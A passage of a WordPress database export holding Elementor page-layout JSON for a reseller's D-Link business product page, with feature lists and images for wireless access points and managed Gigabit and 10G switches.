Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7663,3423,'_elementor_version','2.5.14'),(7664,3423,'_elementor_edit_mode','builder'),(7681,3426,'_wp_page_template','template-fullwidth.php'),(7682,3426,'_elementor_template_type','post'),(7683,3426,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<\\/p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<\\/p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic 